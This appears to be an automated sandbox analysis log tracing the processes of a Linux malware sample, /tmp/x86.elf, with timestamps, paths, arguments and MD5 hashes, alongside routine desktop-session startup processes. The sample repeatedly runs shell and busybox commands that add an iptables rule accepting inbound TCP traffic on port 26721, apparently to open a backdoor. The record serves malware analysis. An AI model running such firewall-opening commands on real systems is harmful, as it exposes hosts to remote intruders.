                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/busybox
                                                Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:2172376 bytes
                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/busybox
                                                Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:2172376 bytes
                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/iptables
                                                Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:99296 bytes
                                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/busybox
                                                Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:2172376 bytes
                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:22
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/busybox
                                                Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                File size:2172376 bytes
                                                MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:21
                                                Start date (UTC):06/10/2024
                                                Path:/tmp/x86.elf
                                                Arguments:-
                                                File size:133292 bytes
                                                MD5 hash:99fc77d3b5e1fc2d3242ca25b4624389

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-sharing
                                                Arguments:/usr/libexec/gsd-sharing
                                                File size:35424 bytes
                                                MD5 hash:e29d9025d98590fbb69f89fdbd4438b3

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/upower/upowerd
                                                Arguments:/usr/lib/upower/upowerd
                                                File size:260328 bytes
                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-wacom
                                                Arguments:/usr/libexec/gsd-wacom
                                                File size:39520 bytes
                                                MD5 hash:13778dd1a23a4e94ddc17ac9caa4fcc1

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-keyboard
                                                Arguments:/usr/libexec/gsd-keyboard
                                                File size:39760 bytes
                                                MD5 hash:8e288fd17c80bb0a1148b964b2ac2279

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-print-notifications
                                                Arguments:/usr/libexec/gsd-print-notifications
                                                File size:51840 bytes
                                                MD5 hash:71539698aa691718cee775d6b9450ae2

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:11
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/upower/upowerd
                                                Arguments:/usr/lib/upower/upowerd
                                                File size:260328 bytes
                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-smartcard
                                                Arguments:/usr/libexec/gsd-smartcard
                                                File size:109152 bytes
                                                MD5 hash:ea1fbd7f62e4cd0331eae2ef754ee605

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gvfsd-fuse
                                                Arguments:-
                                                File size:47632 bytes
                                                MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/fusermount
                                                Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                                File size:39144 bytes
                                                MD5 hash:576a1b135c82bdcbc97a91acea900566

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/upower/upowerd
                                                Arguments:/usr/lib/upower/upowerd
                                                File size:260328 bytes
                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-media-keys
                                                Arguments:/usr/libexec/gsd-media-keys
                                                File size:232936 bytes
                                                MD5 hash:a425448c135afb4b8bfd79cc0b6b74da

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-screensaver-proxy
                                                Arguments:/usr/libexec/gsd-screensaver-proxy
                                                File size:27232 bytes
                                                MD5 hash:77e309450c87dceee43f1a9e50cc0d02

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/upower/upowerd
                                                Arguments:/usr/lib/upower/upowerd
                                                File size:260328 bytes
                                                MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-sound
                                                Arguments:/usr/libexec/gsd-sound
                                                File size:31248 bytes
                                                MD5 hash:4c7d3fb993463337b4a0eb5c80c760ee

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/systemd/systemd
                                                Arguments:-
                                                File size:1620224 bytes
                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/bin/xfce4-panel
                                                Arguments:-
                                                File size:375768 bytes
                                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                File size:35136 bytes
                                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:12
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-housekeeping
                                                Arguments:/usr/libexec/gsd-housekeeping
                                                File size:51840 bytes
                                                MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gnome-session-binary
                                                Arguments:-
                                                File size:334664 bytes
                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/bin/sh
                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:13
                                                Start date (UTC):06/10/2024
                                                Path:/usr/libexec/gsd-power
                                                Arguments:/usr/libexec/gsd-power
                                                File size:88672 bytes
                                                MD5 hash:28b8e1b43c3e7f1db6741ea1ecd978b7

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/usr/lib/udisks2/udisksd
                                                Arguments:-
                                                File size:483056 bytes
                                                MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                Chronological Activities


                                                General

                                                Start time (UTC):13:52:20
                                                Start date (UTC):06/10/2024
                                                Path:/usr/sbin/dumpe2fs
                                                Arguments:dumpe2fs -h /dev/sda2
                                                File size:31112 bytes
                                                MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                Chronological Activities